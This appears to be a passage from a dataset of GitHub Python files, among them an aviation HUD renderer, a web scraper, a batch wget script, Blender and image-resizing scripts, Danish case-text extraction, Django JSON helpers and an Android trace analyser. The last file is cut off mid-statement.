self.__thin_line_width__ = self.__line_width__ >> 1\n self.__thick_line_width__ = self.__line_width__ >> 1\n\n self.__reduced_visuals__ = reduced_visuals\n\n self.__speed_units__ = configuration.CONFIGURATION.__get_config_value__(\n configuration.Configuration.DISTANCE_UNITS_KEY,\n units.STATUTE)\n\n self.__update_units_task__ = tasks.IntermittentTask(\n \"update_speed_units\",\n 1.0,\n self.__update_speed_units__)\n\n def __get_speed_string__(\n self,\n speed\n ) -> str:\n \"\"\"\n Gets the string to display for the speed. 
Uses the units configured by the user.\n\n Arguments:\n speed {number} -- The raw speed from the sensor.\n\n Returns:\n string -- A string with the speed and the correct units.\n \"\"\"\n\n return units.get_converted_units_string(\n self.__speed_units__,\n speed,\n units.SPEED)\n\n def __update_speed_units__(\n self\n ) -> None:\n self.__speed_units__ = configuration.CONFIGURATION.__get_config_value__(\n configuration.Configuration.DISTANCE_UNITS_KEY,\n units.STATUTE)\n\n def uses_ahrs(\n self\n ) -> bool:\n \"\"\"\n Does this element use AHRS data to render?\n\n Returns:\n bool -- True if the element uses AHRS data.\n \"\"\"\n\n return False\n\n def __get_skid_amount__(\n self,\n orientation: AhrsData\n ) -> float:\n \"\"\"\n Get the normalized amount of skid. Makes sure that that\n values between Stratux and Dynon 180 are comparable.\n\n Args:\n orientation (AhrsData): The current, combined AHRS data.\n\n Returns:\n float: The amount of skid.\n \"\"\"\n if orientation.slip_skid is None or isinstance(orientation.slip_skid, str):\n return 0.0\n\n if orientation.is_avionics_source:\n return float(orientation.slip_skid * 3.0)\n\n skid_normalized = -(orientation.slip_skid / 10.0)\n\n return float(skid_normalized)\n\n def __render_text__(\n self,\n framebuffer,\n text: str,\n position: list,\n color: list,\n scale: float = 1.0\n ) -> list:\n \"\"\"\n Renders the given text at the position, color, and scale given.\n\n Args:\n framebuffer: The surface to render to.\n text (str): The text to render.\n position (list): The upper-left hand corner position to render the text at\n color (list): The foreground color of the text.\n scale (float): Any size adjustment (proportion) to adjust the render by.\n\n Returns:\n list: The size of the rendered text.\n \"\"\"\n\n return text_renderer.render_text(\n framebuffer,\n self.__font__,\n text,\n position,\n color,\n colors.BLACK,\n not self.__reduced_visuals__,\n scale)\n\n def __render_horizontal_centered_text__(\n self,\n framebuffer,\n text: str,\n position: list,\n color: list,\n bg_color: list = __get_default_text_background_color__(),\n scale: float = 1.0,\n use_alpha: bool = True\n ) -> list:\n \"\"\"\n Renders the given text so that the given X position is at the center, with\n the given color, and scale given.\n\n Args:\n framebuffer: The surface to render to.\n text (str): The text to render.\n position (list): The center-X and starting Y position to render the text at\n color (list): The foreground color of the text.\n scale (float): Any size adjustment (proportion) to adjust the render by.\n\n Returns:\n list: The size of the rendered text.\n \"\"\"\n\n key, texture, size = text_renderer.get_or_create_text_texture(\n self.__font__,\n text,\n color,\n bg_color,\n use_alpha,\n scale)\n\n x_adjustment = size[0] >> 1\n\n text_renderer.render_cached_texture(\n framebuffer,\n key,\n [position[0] - x_adjustment, position[1]])\n\n return size\n\n def __render_centered_text__(\n self,\n framebuffer,\n text: str,\n position: list,\n color: list,\n bg_color: list = __get_default_text_background_color__(),\n scale: float = 1.0,\n rotation: float = 0.0,\n use_alpha: bool = True\n ) -> list:\n \"\"\"\n Renders the given text so that the given X position is at the center, with\n the given color, and scale given.\n\n Args:\n framebuffer: The surface to render to.\n text (str): The text to render.\n position (list): The center-X and starting Y position to render the text at\n color (list): The foreground color of the text.\n color (list): Any background color 
of the text. May be null for Alpha\n            scale (float): Any size adjustment (proportion) to adjust the render by.\n            rotation (float): Any rotation adjustment (proportion) to adjust the text by.\n\n        Returns:\n            list: The size of the rendered text.\n        \"\"\"\n\n        use_alpha |= bg_color is None\n\n        key, texture, size = text_renderer.get_or_create_text_texture(\n            self.__font__,\n            text,\n            color,\n            bg_color,\n            use_alpha,\n            scale,\n            rotation)\n\n        new_x = position[0] - (size[0] >> 1)\n        new_y = position[1] - (size[1] >> 1)\n\n        text_renderer.render_cached_texture(\n            framebuffer,\n            key,\n            [new_x, new_y])\n\n        return size\n\n    def __render_text_right_justified__(\n        self,\n        framebuffer,\n        text: str,\n        position: list,\n        color: list,\n        scale: float = 1.0\n    ) -> list:\n        \"\"\"\n        Renders the given text at the position, color, and scale given.\n\n        Args:\n            framebuffer: The surface to render to.\n            text (str): The text to render.\n            position (list): The upper-right hand corner position to render the text at\n            color (list): The foreground color of the text.\n            scale (float): Any size adjustment (proportion) to adjust the render by.\n\n        Returns:\n            list: The size of the rendered text.\n        \"\"\"\n\n        key, texture, size = text_renderer.get_or_create_text_texture(\n            self.__font__,\n            text,\n            color,\n            __get_default_text_background_color__(),\n            True,\n            scale)\n\n        text_renderer.render_cached_texture(\n            framebuffer,\n            key,\n            [position[0] - size[0], position[1]])\n\n        return size\n\n    def __render_text_with_stacked_annotations__(\n        self,\n        framebuffer,\n        starting_position: list,\n        scale_text_color_list: list\n    ):\n        \"\"\"\n        Renders text such that the main text is left most,\n        and any additional text packages are rendered to its\n        immediate right, but stacked on top of each other.\n        The position of the stacked text is based on the width\n        of the main text.\n        The first annotation is vertically positioned at the given y,\n        with each additional annotation being moved down by the vertical size\n        of the previous annotation.\n\n        This version is LEFT JUSTIFIED\n\n        Args:\n
            framebuffer: The surface to render the text to.\n            starting_position (list): The starting upper-left hand position to render the text at.\n            scale_text_color_list (list): A list of text description packages.\n        \"\"\"\n\n        # Take the main info and render it on the left at the given y\n        # then take [1], render at the new X and given y\n        # then take[2], render at same X as [1], moved down the split vertical\n\n        main_package = scale_text_color_list[0]\n        main_size = self.__render_text__(\n            framebuffer,\n            main_package[1],\n            starting_position,\n            main_package[2],\n            main_package[0])\n\n        current_position = [starting_position[0] + main_size[0],\n                            starting_position[1]]\n\n        for (scale, text, color) in scale_text_color_list[1:]:\n            info_size = self.__render_text__(\n                framebuffer,\n                text,\n                current_position,\n                color,\n                scale)\n\n            current_position[1] += info_size[1]\n\n    def __render_text_with_stacked_annotations_right_justified__(\n        self,\n        framebuffer,\n        starting_position: list,\n        scale_text_color_list: list\n    ):\n        \"\"\"\n        Renders text such that the main text is left most,\n        and any additional text packages are rendered to its\n        immediate right, but stacked on top of each other.\n        The position of the stacked text is based on the width\n        of the main text.\n        The first annotation is vertically positioned at the given y,\n        with each additional annotation being moved down by the vertical size\n        of the previous annotation.\n\n        This version does it such that the text is right\n        justified.\n\n        Args:\n            framebuffer: The surface to render the text to.\n            starting_position (list): The starting upper-right hand position to render the text at.\n            scale_text_color_list (list): A list of text description packages.\n        \"\"\"\n\n        # Take the main info and render it on the left at the given y\n        # then take [1], render at the new X and given y\n        # then take[2], render at same X as [1], moved down the split vertical\n\n        current_position = [starting_position[0], starting_position[1]]\n        longest_x = 0\n\n        for (scale, text, color) in scale_text_color_list[1:]:\n            info_size = self.__render_text_right_justified__(\n                framebuffer,\n                text,\n                current_position,\n                color,\n                scale)\n\n            current_position[1] += info_size[1]\n\n            longest_x = max(info_size[0], longest_x)\n\n        main_package = scale_text_color_list[0]\n        self.__render_text_right_justified__(\n            framebuffer,\n            main_package[1],\n            [current_position[0] - longest_x, starting_position[1]],\n            main_package[2],\n            main_package[0])\n\n    def render(\n        self,\n        framebuffer,\n        orientation\n    ):\n        self.__update_units_task__.run()\n\n\nclass AhrsElement(HudElement):\n    \"\"\"\n    Common definition for view elements that use AHRS.\n    \"\"\"\n\n    GPS_UNAVAILABLE_TEXT = \"NO GPS\"\n    INOPERATIVE_TEXT = \"INOP\"\n\n    def uses_ahrs(\n        self\n    ) -> bool:\n        \"\"\"\n        Does this element use AHRS data to render?\n\n        Returns:\n            bool -- True if the element uses AHRS data.\n        \"\"\"\n\n        return True\n","repo_name":"JohnMarzulli/StratuxHud","sub_path":"views/ahrs_element.py","file_name":"ahrs_element.py","file_ext":"py","file_size_in_byte":12472,"program_lang":"python","lang":"en","doc_type":"code","stars":112,"dataset":"github-code","pt":"53"} +{"seq_id":"29603865581","text":"\nimport requests\n\ndivar=requests.get('https://divar.ir/s/tehran')\n\nfrom bs4 import BeautifulSoup\n\ndivar_soup= BeautifulSoup(divar.text ,'html.parser')\nval=divar_soup.find_all('div',attrs={'class':'post-card-item kt-col-6 kt-col-xxl-4'})\n\nfor item in val:\n    price = item.find('div', class_ = 'kt-post-card__description')\n    if str(price) !='None' and price.text=='توافقی':\n        print(item.text)","repo_name":"sabaafshar7/Divar","sub_path":"divar1.py","file_name":"divar1.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22558005025","text":"import sys\nimport subprocess\nfrom concurrent.futures import ThreadPoolExecutor as Pool\n\n\ndef run_cmd(cmd):\n    return subprocess.call(cmd, shell=True)\n\nfile = sys.argv[1]\ntargets = [x.strip() for x in open(file)]\ncmds = []\nfor each in targets:\n    cmd = 'wget {}'.format(each)\n    cmds.append(cmd)\n\nwith Pool(5) as pool:\n    pool.map(run_cmd, cmds)\n\n","repo_name":"gudeqing/biodev","sub_path":"smallScripts/batch_wget.py","file_name":"batch_wget.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"24543163199","text":"import bpy\nimport random\n\nfor x in range(1, 100):\n    for y in range(1, 100):\n        xSpacing = x * 1.2\n        ySpacing = y * 1.2\n        height = random.randint(2, 15)\n        location = (xSpacing, ySpacing, height / 2)\n        bpy.ops.mesh.primitive_cube_add(size=2, enter_editmode=False, align='WORLD', location=(\n            location), scale=(1, 1, 1 * height))\n\n\nbpy.ops.object.select_all(action='SELECT')\nfor obj in bpy.context.scene.objects:\n    if obj.type == 'MESH':\n        obj.location.z = 0.0\n        obj.scale = (1, 1, 0)\n        obj.keyframe_insert(data_path=\"scale\", frame=0)\n\ncounter = 1\n\n# mat1 =
bpy.data.materials['Material.001']\n# mat2 = bpy.data.materials['Material.002']\nfor obj in bpy.context.scene.objects:\n if obj.type == 'MESH':\n obj.location.z = 0.0\n height = random.randint(2, 10)\n obj.scale = (1, 1, 1 * height)\n obj.keyframe_insert(data_path=\"scale\", frame=height*10)\n # print(\"Frame: \" + str(counter))\n counter += 1\n \n mat = bpy.data.materials.new(name='Material')\n mat.use_nodes = True\n principled_node = mat.node_tree.nodes.get('Principled BSDF')\n principled_node.inputs[0].default_value = (random.random(), random.random(), random.random(), 0.5)\n obj.data.materials.append(mat)\n\nbpy.ops.mesh.primitive_plane_add(enter_editmode=False, align='WORLD', location=(0, 0, 0), scale=(1, 1, 1))\n","repo_name":"yannstlo/Box-Animation","sub_path":"Boxes.py","file_name":"Boxes.py","file_ext":"py","file_size_in_byte":1409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21246487500","text":"#!/usr/bin/env python\n# coding: utf-8\n\nimport re\nimport os\nfrom os.path import join\nimport json\nimport unicodedata\n\ndef is_pua(c): #https://stackoverflow.com/questions/56337705/removing-all-invalid-characters-e-g-uf0b7-from-text\n \"\"\"\n Detecting invalid unicode characters. Returns bool.\n \"\"\"\n \n return unicodedata.category(c) in ['Co', 'Cc', 'Cf', 'Cs', 'Co', 'Cn']\n\ndef text_splitter(file):\n \"\"\"\n Split document to individual cases. Returns list of strings (one string per case).\n \"\"\"\n\n #pattern = re.compile(r'\\s{0,5}\\n(?=\\s{0,4}Ankestyrelsen\\s{0,4}\\n)', re.DOTALL)\n #pattern = re.compile(r'\\s{0,5}\\n\\s{0,5}A ?n ?k ?e ?s ?t ?y ?r ?e ?l ?s ?e ?n ?\\s{0,5}\\n\\s{0,5}(?!.{0,2}7998)', re.DOTALL)\n pattern = re.compile(r'{PB}(?=.{0,1000}A\\s?f\\s?g\\s?ø\\s?r\\s?e\\s?l\\s?s\\s?e\\s?r?\\s{0,5}\\n\\s{0,5}D\\s?u\\s? \\s?h\\s?a\\s?r\\s? \\s?k\\s?l\\s?a\\s?g\\s?e\\s?t\\s? 
\\s?o\\s?v\\s?e\\s?r\\s?)', re.DOTALL)\n    pattern_replace = re.compile(r'(?<=\\n)G\\'(?=\\s)')\n    num_sq_replace = re.compile(r'\\[\\s?\\d\\s?\\]')\n    \n    doc_text = file.get('text_pypdf')\n    text_strip = doc_text.replace('\\n', '{LINJESKIFT}')\n    text_strip = ''.join(c for c in text_strip if not is_pua(c))\n    text_strip = text_strip.replace('{LINJESKIFT}', '\\n')\n    text_strip = text_strip.replace('{PB}', '\\n')\n    text_strip = re.sub(pattern_replace, '', text_strip)\n    text_strip = re.sub(num_sq_replace, ' ', text_strip)\n    text_strip = text_strip.replace('  ', ' ')\n    text_strip = text_strip.replace(' -', '-')\n    text_strip = text_strip.replace('- ', '-')\n    \n    \n    texts_split = pattern.split(text_strip)\n    texts_split.pop(0) # the first found text is always superfluous\n    \n    texts_return = []\n    n = 1\n    for text in texts_split:\n        if len(text) < 200:\n            continue\n        \n        text_returndict = {'filename': file.get('filename'),\n                           'text': text,\n                           'n': n,\n                           'doc_text': file.get('text_pdfminer')}\n        \n        texts_return.append(text_returndict)\n        \n        n = n + 1\n    \n    return(texts_return)\n\ndef clean_text(text):\n\n    # regexes\n    pattern_replace = re.compile(r'(?<=\\n)G\\'(?=\\s)')\n    num_sq_replace = re.compile(r'\\[\\s?\\d\\s?\\]')\n\n    text_strip = text.replace('\\n', '{LINJESKIFT}')\n    text_strip = ''.join(c for c in text_strip if not is_pua(c))\n    text_strip = text_strip.replace('{LINJESKIFT}', '\\n')\n    text_strip = re.sub(pattern_replace, '', text_strip)\n    text_strip = re.sub(num_sq_replace, ' ', text_strip)\n    text_strip = text_strip.replace('  ', ' ')\n    text_strip = text_strip.replace('—', '-')\n    text_strip = text_strip.replace(' -', '-')\n    text_strip = text_strip.replace('- ', '-')\n    text_strip = text_strip.replace('-\\n', '')\n    \n    return(text_strip)\n\n\ndef get_info_meta(text):\n    \"\"\"\n    Extract info from meta information in case document (right margin on first page)\n    \"\"\"\n\n    # regexes\n    jnr_re = re.compile(r'j\\.nr\\.?\\s+([0-9]+\\s?[-—]\\s?[0-9]+)', re.IGNORECASE)\n    date_re = re.compile(r'(?<=\\n)\\d{1,2}\\..{0,3}\\w{3,10}\\s?\\d{4}')\n\n    text = clean_text(text)\n\n    info_dict = {}\n\n    try:\n        jnr = jnr_re.search(text).group(1)\n    except:\n        jnr = 'not found'\n\n    try:\n        date = date_re.search(text).group(0)\n    except:\n        date = 'not found'\n\n    info_dict['jnr'] = jnr\n    info_dict['date'] = date\n    \n    return(info_dict)\n\n\ndef get_info_cpr(text):\n    \"\"\"\n    Extract CPR info from case document.\n    \"\"\"\n\n    # regexes\n    cpr_re = re.compile(r'\\nCpr\\.\\s?nr\\.\\s+(\\d+)\\s+(\\d+)', re.IGNORECASE)\n\n    text = clean_text(text)\n\n    info_dict = {}\n\n    try:\n        birthyear = cpr_re.search(text).group(1)\n        if int(birthyear) > 21:\n            birthyear = '19' + birthyear\n        else:\n            birthyear = '20' + birthyear\n        \n    except:\n        birthyear = 'not found'\n    \n    try:\n        gender = cpr_re.search(text).group(2)\n        \n        if int(gender) % 2 == 0:\n            gender = 'female'\n        else:\n            gender = 'male'        \n    except:\n        gender = 'not found'\n\n    info_dict['birthyear'] = birthyear\n    info_dict['gender'] = gender\n\n    return(info_dict)\n\n\ndef get_info_main(text):\n    \"\"\"\n    Extract info from main text in case document, including grounds.\n    \"\"\"\n    \n    # regexes\n    kommune_re = re.compile(r'Du har klaget over ([a-zæøå]+(?:\\-[a-zæøå]+)?)\\s\\s?[K]\\w+', re.IGNORECASE) # municipality name\n    caseworker_re = re.compile(r'venlig hilsen\\s{1,5}([a-zæøå]+\\s[a-zæøå]+(\\s[a-zæøå]+)?)', re.IGNORECASE) # caseworker\n    crit_re = re.compile(r'(?<=\\n)vi kritiserer', re.IGNORECASE) # criticises the municipality\n    subsid_am_re = re.compile(r'revalidering.{2,25}subsidiær.{5,40}arbejdsmarkedsordninger', re.IGNORECASE |
re.DOTALL) # subsidiary with respect to labour-market schemes\n    subsid_udd_re = re.compile(r'revalidering.{2,25}subsidiær.{5,40}uddannelsesordninger', re.IGNORECASE | re.DOTALL) # subsidiary with respect to education schemes\n    usikkert_re = re.compile(r'usikkert.{4,8}revalidering.{4,8}nødvendigt', re.IGNORECASE | re.DOTALL) # uncertain whether rehabilitation is necessary - \"usikkert\" is not used in other contexts\n\n    ## grounds (\"begrundelser\"); the regex targets phrases such as:\n    ### - Vi lægger vægt …\n    ### - Vi lægger også vægt på … \n    ### - Vi lægger desuden vægt på …\n\n    #important_regex = re.compile(r'(?<=\\n)((?:[\\w\\s]{0,25})?(?:vi )?lægger (?:vi )?(?:[\\w\\s]{3,30})? ?vægt på.*?)(?=\\s{1,3}\\n\\s{1,3}\\n)', re.IGNORECASE|re.DOTALL) \n    important_regex = re.compile(r'(?<=\\n)((?:[\\w\\s]{0,25})?(?:vi )?lægger (?:vi )?(?:[\\w\\s]{3,30})? ?vægt på.*?)(?=\\n\\n)', re.IGNORECASE|re.DOTALL) \n\n    ## \"åbenlyst\" (obviously), e.g.:\n    ## - \"vurderes åbenlyst, at du ikke opfylder betingelserne\"\n    obv_re = re.compile(r'.{50}åbenlys.{150}', re.IGNORECASE | re.DOTALL)\n\n    # Clean text\n    text = clean_text(text)\n\n    # Dictionary for info\n    info_dict = {}\n\n\n    try:\n        kommune = kommune_re.search(text).group(1)\n    except:\n        kommune = 'not found'\n    \n    try:\n        caseworker = caseworker_re.search(text).group(1)\n    except:\n        caseworker = 'not found'\n    \n    grounds = important_regex.findall(text)\n    grounds_len = len(''.join(grounds))\n    \n    info_dict['kommune'] = kommune\n    info_dict['caseworker'] = caseworker\n    info_dict['kritik_kommune'] = bool(crit_re.search(text))\n    info_dict['subsid_am'] = bool(subsid_am_re.search(text))\n    info_dict['subsid_udd'] = bool(subsid_udd_re.search(text))\n    info_dict['usikkert'] = bool(usikkert_re.search(text))\n    info_dict['grounds'] = grounds\n    info_dict['grounds_nchar'] = grounds_len\n    info_dict['vurdering_åbenlys'] = bool(obv_re.search(text))\n    \n    return(info_dict)","repo_name":"CALDISS-AAU/bp_mineAnkestyrelsen","sub_path":"modules/mineank_funs.py","file_name":"mineank_funs.py","file_ext":"py","file_size_in_byte":6655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21352591817","text":"# -*- coding: utf-8 -*-\n\nclass Solution:\n    def permutate(self, result, chars, begin):\n        if len(chars) -1 == begin:\n            result.append(''.join(chars))\n        else:\n            for i in range(begin, len(chars)):\n                if (i != begin and chars[i] == chars[begin]):\n                    continue\n                chars[i], chars[begin] = chars[begin], chars[i]\n                self.permutate(result, chars, begin+1)\n                # to avoid duplicates, swap the element at begin back after recursing\n                chars[i], chars[begin] = chars[begin], chars[i]\n    \n    def Permutation(self, ss):\n        # write code here\n        chars = list(ss)\n        result = []\n        self.permutate(result, chars, 0)\n        # sort\n        result = sorted(result, key=lambda x: [xx for xx in x])\n        return result\n\nif __name__ == '__main__':\n    s = Solution()\n    r = s.Permutation('abc')\n    print(r)\n","repo_name":"SeanLee97/datastruct_and_algorithms","sub_path":"interview/CyC2018_Interview-Notebook/剑指offer/38.py","file_name":"38.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"53"} +{"seq_id":"70342124008","text":"\nimport os\nimport cv2\n''' Set the image path; the directory contains 14 jpg photos named 0.jpg, 1.jpg, 2.jpg, ..., 14.jpg'''\nDATADIR = \"./resized2014\"\nNEWDIR=\"E:\\\\Code\\python\\\\multi-label\\\\Multiple-instance-learning-master\\\\CNN_RNN\\\\data\\\\resized\"\n'''Set the target pixel size; here it is set to 300'''\nIMG_SIZE=256\n'''Use the join method of the os.path module to build the path'''\npath=os.path.join(DATADIR)
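\n# Note: os.listdir() returns names in arbitrary order and may also include\n# non-image files. A more defensive listing (a hypothetical variant, not in\n# the original script) would be:\n#   img_list = sorted(f for f in os.listdir(path) if f.lower().endswith('.jpg'))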
\n'''os.listdir(path) returns the names of all files and folders under path.\nFor example, after the next line runs, img_list is a list such as ['0.jpg','1.jpg','10.jpg','11.jpg','12.jpg','13.jpg','14.jpg',\n'2.jpg','3.jpg','4.jpg', '5.jpg', '6.jpg', '7.jpg', \n'8.jpg', '9.jpg']; note that this order is not numerically ascending'''\nimg_list=os.listdir(path)\n\nind=0\nfor img in img_list:\n    '''Read the image with cv2.imread in IMREAD_COLOR mode'''\n    img_array=cv2.imread(os.path.join(path,img),cv2.IMREAD_COLOR)\n    '''Resize the image with cv2.resize'''\n    # print(os.path.join(path,img))\n    new_array=cv2.resize(img_array,(IMG_SIZE,IMG_SIZE))\n    img_name=str(ind)+'.jpg'\n    '''Build the destination path for saving the image'''\n    save_path=os.path.join(NEWDIR, img)\n    ind=ind+1\n    '''Save the image with cv2.imwrite'''\n    cv2.imwrite(save_path,new_array)\n","repo_name":"silenbee/Multi-label-Learning","sub_path":"CNN-RNN/data/resize.py","file_name":"resize.py","file_ext":"py","file_size_in_byte":1313,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38866326394","text":"import json\n\nfrom django.shortcuts import render\nfrom growl.external.minify_json import json_minify\nfrom growl.models import model_encode\nfrom growl.models import model_encode_verbose\n\ndef error_dict(http_status_code=400):\n    error_dict = _response_dict()\n    error_dict['error_code'] = 1\n    error_dict['error_msg'] = 'Unknown error'\n    error_dict['http_status_code'] = http_status_code\n    return error_dict\n\ndef success_dict(http_status_code=200):\n    success_dict = _response_dict()\n    success_dict['error_code'] = 0\n    success_dict['error_msg'] = ''\n    success_dict['http_status_code'] = http_status_code\n    return success_dict\n\ndef render_json(request, json_values, verbose=False, minify=True):\n    http_status = json_values['http_status_code']\n    encode = model_encode\n    if verbose:\n        encode = model_encode_verbose\n    json_dumps = json.dumps(json_values, default=encode)\n\n    # minify json for smallest payload\n    if minify:\n        json_dumps = json_minify(json_dumps)\n\n    context = {}\n    context['json'] = json_dumps\n\n    return render(request, 'growl/json.html', context, status=http_status)\n\ndef render_json_500(request, json_values=None, verbose=False, minify=True):\n    json_values = json_values or error_dict(http_status_code=500)\n    json_values['error_code'] = 500\n    json_values['http_status_code'] = 500 \n\n    encode = model_encode\n    if verbose:\n        encode = model_encode_verbose\n    json_dumps = json.dumps(json_values, default=encode)\n\n    # minify json for smallest payload\n    if minify:\n        json_dumps = json_minify(json_dumps)\n\n    context = {}\n    context['json'] = json_dumps\n    return render(request, 'growl/json.html', context, status=500)\n\n# service is down, shields up\ndef render_json_503(request, json_values=None, verbose=False, minify=True):\n    json_values = json_values or error_dict(http_status_code=503)\n    json_values['error_code'] = 503\n    json_values['http_status_code'] = 503 \n    json_values['error_msg'] = 'Service not available'\n\n    encode = model_encode\n    if verbose:\n        encode = model_encode_verbose\n    json_dumps = json.dumps(json_values, default=encode)\n\n    # minify json for smallest payload\n    if minify:\n        json_dumps = json_minify(json_dumps)\n\n    context = {}\n    context['json'] = json_dumps\n    return render(request, 'growl/json.html', context, status=503)\n\n###\n### PRIVATE\n###\n\ndef _response_dict():\n    response_dict = {}\n    response_dict['error_code'] = 0\n    response_dict['error_msg'] = ''\n    response_dict['http_status_code'] = 200\n    return
response_dict","repo_name":"aschulak/growl-engine","sub_path":"growlengine/growl/views/response.py","file_name":"response.py","file_ext":"py","file_size_in_byte":2589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36126913786","text":"try:\n from logbook import Logger\nexcept ImportError:\n import logging\n logging.basicConfig()\n from logging import getLogger as Logger\n\nfrom collections import defaultdict, namedtuple\nfrom ftrace.interval import Interval, IntervalList\nfrom ftrace.event import EventList\nfrom ftrace.ftrace import register_api, FTraceComponent\nfrom ftrace.composites import sorted_items\nfrom ftrace.utils.decorators import requires, coroutine, memoize\nfrom ftrace.atrace import AtraceTag\nfrom ftrace.common import filter_by_task\nfrom six import string_types\n\nlog = Logger('Android')\n\nVSYNC = float(1/60.) # 16.67ms\nUI_THREAD_DRAW_NAMES = ['performTraversals', 'Choreographer#doFrame']\nRENDER_THREAD_DRAW_NAMES = ['DrawFrame']\n\nContext = namedtuple('Context', ['pid', 'name', 'interval', 'event'])\nCounter = namedtuple('Counter', ['pid', 'name', 'value', 'interval', 'event'])\n# For app launch latency\nLaunchLatency = namedtuple('LaunchLatency', ['task', 'interval', 'latency'])\n# For touch & input latency\nInputLatency = namedtuple('InputLatency', ['interval', 'latency'])\n# For Rendering intervals\nRendering = namedtuple('Rendering', ['interval'])\n\n\n@register_api('android')\nclass Android(FTraceComponent):\n \"\"\"\n Class with APIs to process android trace events\n written to the trace buffer. These are events not\n part of ftrace API but useful for monitoring performance of\n various frameworks in android OS. Some events (as of Lollipop) are:\n\n gfx - Graphics\n input - Input\n view - View System\n webview - WebView\n wm - Window Manager\n am - Activity Manager\n sync - Sync Manager\n audio - Audio\n video - Video\n camera - Camera\n hal - Hardware Modules\n app - Application\n res - Resource Loading\n dalvik - Dalvik VM\n rs - RenderScript\n bionic - Bionic C Library\n power - Power Management\n\n See `adb shell atrace --list_categories`.\n\n \"\"\"\n def __init__(self, trace):\n self._trace = trace\n self._events = trace.events\n\n self.__event_handlers = {}\n self._tmw_intervals_by_name = defaultdict(IntervalList)\n\n def _initialize(self):\n self._parse_tmw_events()\n\n @property\n @requires('tracing_mark_write')\n def event_names(self):\n return set(self._tmw_intervals_by_name.keys())\n\n @requires('tracing_mark_write')\n @memoize\n def event_intervals(self, name=None, task=None,\n interval=None, match_exact=True):\n \"\"\"Returns event intervals for specified `name` and `task`\n Name here implies `section` or `counter` name.\n \"\"\"\n if name is None:\n intervals = \\\n IntervalList(sorted_items(self._tmw_intervals_by_name.values()))\n elif isinstance(name, string_types):\n if match_exact:\n intervals = self._tmw_intervals_by_name[name]\n else:\n intervals = IntervalList(sorted_items(value for key, value in\n self._tmw_intervals_by_name.iteritems() if name in key))\n else: # assume iterable (must match exact)\n intervals = IntervalList(sorted_items(value for key, value in\n self._tmw_intervals_by_name.iteritems() if key in name))\n intervals = intervals.slice(interval=interval)\n if task:\n intervals = IntervalList(filter(lambda it: it.event.task == task, intervals))\n\n return intervals\n\n #--------------------------------------------------------------------------\n \"\"\"\n Utility 
script to estimate Frame Rate (FPS) and Jank.\n\n    Jank = Interval when surfaceFlinger failed to present.\n    \"\"\"\n    \n    def rendering_intervals(self, interval=None):\n        \"\"\"\n        Groups frames into rendering intervals, splitting wherever two\n        consecutive frames are more than two VSYNC periods apart.\n        \"\"\"\n        frames = self.frame_intervals(interval=interval)\n        rendering_intervals = IntervalList()\n        slice_start = frames[0].interval.start\n        for i, j in zip(frames[:-1], frames[1:]):\n            if j.interval.start-i.interval.end > 2*VSYNC:\n                # new group of frames.\n                ri = Rendering(interval=Interval(slice_start, i.interval.end))\n                rendering_intervals.append(ri)\n                slice_start = j.interval.start\n        return rendering_intervals\n    \n    @requires('tracing_mark_write')\n    @memoize\n    def render_frame_intervals(self, task=None, interval=None):\n        \"\"\"\n        Returns intervals a frame from render thread was processed.\n        \"\"\"\n        return self.event_intervals(name=RENDER_THREAD_DRAW_NAMES, task=task,\n                                    interval=interval, match_exact=False)\n\n    @requires('tracing_mark_write')\n    @memoize\n    def ui_frame_intervals(self, task=None, interval=None):\n        \"\"\"\n        Returns intervals a frame from UI thread was processed.\n        \"\"\"\n        return self.event_intervals(name=UI_THREAD_DRAW_NAMES, task=task,\n                                    interval=interval, match_exact=False)\n    \n    @requires('tracing_mark_write')\n    @memoize\n    def frame_intervals(self, task=None, interval=None):\n        \"\"\"\n        Returns intervals a frame from both UI & Render threads were processed.\n        \"\"\"\n        names = ['animator:'] + UI_THREAD_DRAW_NAMES + RENDER_THREAD_DRAW_NAMES\n        return self.event_intervals(name=names, task=task,\n                                    interval=interval, match_exact=False)\n\n    @requires('tracing_mark_write')\n    @memoize\n    def present_duration(self, interval=None):\n        \"\"\"\n        Returns the accumulated time during which frames were actually being\n        presented (VSYNC intervals shorter than two VSYNC periods).\n        \"\"\"\n        present_duration = 0.0\n        vsync_events = self.event_intervals(name='VSYNC-sf', interval=interval)\n        if not vsync_events:\n            vsync_events = self.event_intervals(name='VSYNC', interval=interval)\n        for vsync_event in vsync_events:\n            duration = vsync_event.interval.duration\n            if duration < 2*VSYNC:\n                present_duration += duration\n        return present_duration\n\n
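    # Hypothetical usage sketch (an assumption, not part of the original module:\n    # presumes the parsed trace object exposes this component as `trace.android`,\n    # per the register_api('android') decorator above):\n    #\n    #   fps = trace.android.framerate()     # frames per second of present time\n    #   janks = trace.android.num_janks()   # count of missed frames\n    #   rate = trace.android.jankrate()     # janks per second of present time\n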
no 'postFramebuffer' events)\n # there was jank in this interval.\n if vsync_event_a.value != vsync_event_b.value and frames_presented:\n total_frames += frames_presented\n \n present_time = self.present_duration(interval=interval)\n return round(total_frames/present_time, 1) if present_time != 0.0 else float('nan')\n\n @requires('tracing_mark_write')\n @memoize\n def jank_intervals(self, interval=None):\n \"\"\"\n Returns list of intervals when a jank (missed frame) occurred.\n \"\"\"\n missedFrames = self.event_intervals('FrameMissed', interval=interval)\n return IntervalList(filter(lambda x:x.value==1, missedFrames))\n\n @requires('tracing_mark_write')\n @memoize\n def num_janks(self, interval=None):\n \"\"\"\n Returns number of janks (missed frame) within interval.\n \"\"\"\n return len(self.jank_intervals(interval=interval))\n \n @requires('tracing_mark_write')\n @memoize\n def jankrate(self, interval=None):\n \"\"\"\n Returns number of janks (missed frame) per second within interval.\n \"\"\"\n try:\n return round(self.num_janks(interval=interval) / self.present_duration(interval=interval), 1)\n except ZeroDivisionError:\n return 